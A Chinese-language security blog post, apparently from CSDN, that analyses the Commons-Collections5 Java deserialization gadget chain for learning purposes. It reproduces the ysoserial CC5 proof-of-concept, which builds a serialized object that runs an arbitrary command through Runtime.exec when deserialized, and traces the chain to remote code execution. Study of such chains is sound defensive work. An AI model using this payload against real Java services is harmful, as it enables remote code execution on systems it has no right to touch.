[JAVA反序列化初学3]Commons-Collections5利用链分析

已于 2022-03-24 21:56:56 修改
阅读量5.1k 收藏
点赞数 5
分类专栏: JAVA安全 文章标签: java web安全
于 2022-03-24 21:33:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/123720126
版权

文章目录

前言

上次搞完CC1链之后,大佬说CC5链和CC1比较像,而且也比较单纯,比CC1好分析很多,于是就来看CC5了。

在jdk1.8中CC1的Annotationinvocation的readObject方法被改写了,于是诞生了CC5。CC5同样也是针对CommonsCollections3.1到3.2.1,jdk1.7到1.8。

CC5后半段与CC1完全相同,恶意对象反序列化在BadAttributeValueExpException类进入,然后经过TiedMapEntry类之后到达LazyMap的get方法。看过CC1链的都知道LazyMap的get方法能够直接执行ChainedTransformer的transform了,后面就是那条执行命令的链。

一、ysoserial的POC

首先把POC摆出来,从POC分析下去。

	public BadAttributeValueExpException getObject(final String command) throws Exception {
		final String[] execArgs = new String[] { command };
		// inert chain for setup
		final Transformer transformerChain = new ChainedTransformer(
		        new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer("getMethod", new Class[] {
					String.class, Class[].class }, new Object[] {
					"getRuntime", new Class[0] }),
				new InvokerTransformer("invoke", new Class[] {
					Object.class, Object[].class }, new Object[] {
					null, new Object[0] }),
				new InvokerTransformer("exec",
					new Class[] { String.class }, execArgs),
				new ConstantTransformer(1) };

		final Map innerMap = new HashMap();

		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
		Field valfield = val.getClass().getDeclaredField("val");
        Reflections.setAccessible(valfield);
		valfield.set(val, entry);

		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

		return val;
	}

LazyMap以上的部分都与CC1相同。接下来就分析一下后半段Poc。

二、TiedMapEntry

在POC中,用LazyMap实例化了TiedMapEntry类。进去看看。主要是寻找有可能调用到LazyMap的get方法的地方。还非常的明显,就一个地方用到了get,就是这个getValue方法,this.map可控。
TiedMapEntry.getValue
但是意外的是该类中还有别的方法调用到了这个getValue。三个方法都用到了getValue。
在这里插入图片描述

这意味着外部只需要调用其中一个就会执行到getValue,从而执行到LazyMap的get方法。

三、BadAttributeValueExpException

POC继续往下面看,创建了一个BadAttributeValueExpException对象,并且传入entry(上文中的TiedMapEntry对象)到他的成员变量val中。
在这里插入图片描述
跟进类中看看。类中实现了readObject方法,可以用来反序列化,而且在反序列化的时候,将val的值放入valObj中(entry),然后判断如果valObj是Long、Interger、Float、Double、Byte、Short、布尔或者System.getSecurityManager() 为空的话,我们就能执行valObj.toString。
在这里插入图片描述
很明显,valObj怎么会是这些数字类型的对象呢?那么我们就要满足System.getSecurityManager() ==null。
在这里插入图片描述
于是我试了JDK1.7和1.8,发现这个参数的默认值都是null,意味着1.7和1.8版本都需要手动开启这个安全模式,否则就会被CC5攻击。到这里就结束了。

CC5利用链总结

BadAttributeValueExpException.readObject() --> TiedMapEntry.toString() --> TiedMapEntry.getValue() --> LazyMap.get() --> ChainedTransformer.transform() --> RCE!!!

最后

CC1分析过之后分析CC5真的是舒服多了,希望各位师傅多多指点。

Cgxx
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Java安全学习笔记--基于ysoserial反序列化利用工具CC2和CC5链构造方式的思考
m0_64685672的博客
02-02 2504
前言:ysoserial反序列化利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法 把三个方法放一块 public V getValue() { return this.map.get(this.key);//这里的this.map就是我们的LazyMap } //LazyMap的get方法: public V get(Object
Java安全学习笔记--反序列化漏洞利用链CC5链
m0_64685672的博客
01-22 1210
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。CC1LazyMap链 利用链核心 Transformer[] transformers=new Transforme.
Java安全--CC5
qq_64201116的博客
12-21 455
再往后一路都比较熟悉就不说了。
Javaweb安全——反序列化漏洞-CC&CB链思路整理
weixin_43610673的博客
10-28 2282
如上图所示基本上起点终点就是那几个点然后相互拼接:《Shiro RememberMe 漏洞检测的探索之路》中Koalr师傅已经对CommonsCollections 系列 gadget进行了提纯变成以下四条对命令执行部分的调用分别为InvokerTransformer调用TemplatesImpl对 commons-Collections4 的适配则直接用替换。
java--CommonsCollections5学习
zyer
05-30 232
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
[Java反序列化]—CommonsCollections5
snowlyzz的博客
11-29 330
CC5分析
Java安全反序列化-CC5反序列化漏洞POP链分析_ysoserial CommonsCollections5 PoC分析
Ho1aAs‘s Blog
03-12 991
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. TiedMapEntry.toString()调用this.map.get()3. BadAttributeValueExpException反序列化触发this.val.toString()POP链完 前言 由于jdk8修复了AnnotationInvokerHandler,cc1用不了了 cc5在cc1点基础上做了小的改进,还是使用Commons-Collect
告别脚本小子系列丨JAVA安全(7)——反序列化利用链(中)
C20220511的博客
04-27 541
0x01 前言距离上一次更新JAVA安全的系列文章已经过去一段时间了,在上一篇文章中介绍了反序列化利用链基本知识,并阐述了Transform链的基本知识。Transform链并不是一条完整的利用链,只是CommonsCollections利用链中的一部分。当然并不是所有的CC链都需要用Transform链。为了更方便的理解CC链,我们并不会按照顺序来阐述所有的链,而是按照链的难易程度,由易到难。往期推荐1告别脚本小子系列丨JAVA安全(1)——JAVA本地调试和远程调试技巧2告别脚本小子系列丨JAVA安全(
Java安全学习笔记--反序列化漏洞利用链CC6链
m0_64685672的博客
01-24 1032
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 HashSet HashSet使用的是Hash表的数据结构,增删改查的时间复杂度为O(1),Set是一种集合,元素没有添加顺序,集合中不会有重复元素,结合一下就大概知道HashSet的大概属性了,具体是否重复的算法是根据元素所属对象的equals()方法来判断是否重复,默认是Object这个父类的方法,会比较引用是否相同,这个方法是可以重写的,比如String类就重写了这个方法,会比较内容是否相同 .
yso-cc5
springgold的博客
10-20 140
yso-cc5 1.从入口看 关键类BadAttributeValueExpException。 BadAttributeValueExpException类的readobject,调用 val = valObj.toString() val已被赋值为TiedMapEntry类,toString方法如下: public String toString() { return this.getKey() + "=" + this.getValue(); } //调用getVa
Java安全Commons Collections5
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-07 601
【代码】Java安全Commons Collections5。
Ysoserial Commons-Collections利用链分析
further_eye的博客
09-09 358
Commons-Collections1 首先构造transformers反射链,调用ChainedTransformer方法封装transformers数组,串联三次反射。 final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Cl
java反序列化Commons-Collections5分析
weixin_30381317的博客
12-30 382
BadAttributeValueException package org.lain.poc; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.c...
Commons Collections的简易理解
编程reborn
07-05 1719
Apache Commons Collections是一个用来处理集合Collection的开源工具包,比如你可以用来将一个对象拷贝多份并存放到一个Bag对象中(这个看来没有多大用处),得到两个集合里相同的元素,删除一个集合里的元素并返回删除的元素,还有除了通过一个集合里的key得到value外,还可以通过value 得到key,也就是说这个集合里的value是唯一的,另外还可以将一个集合里的ke
commons-collections3.jar
08-07
commons-collections3.jar 是 Apache Commons Collections 框架的一个重要库文件。Apache Commons Collections 是一个开源的 Java 框架,提供了许多有用的集合类和工具,扩展了 Java 原生集合框架的功能。 commons-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值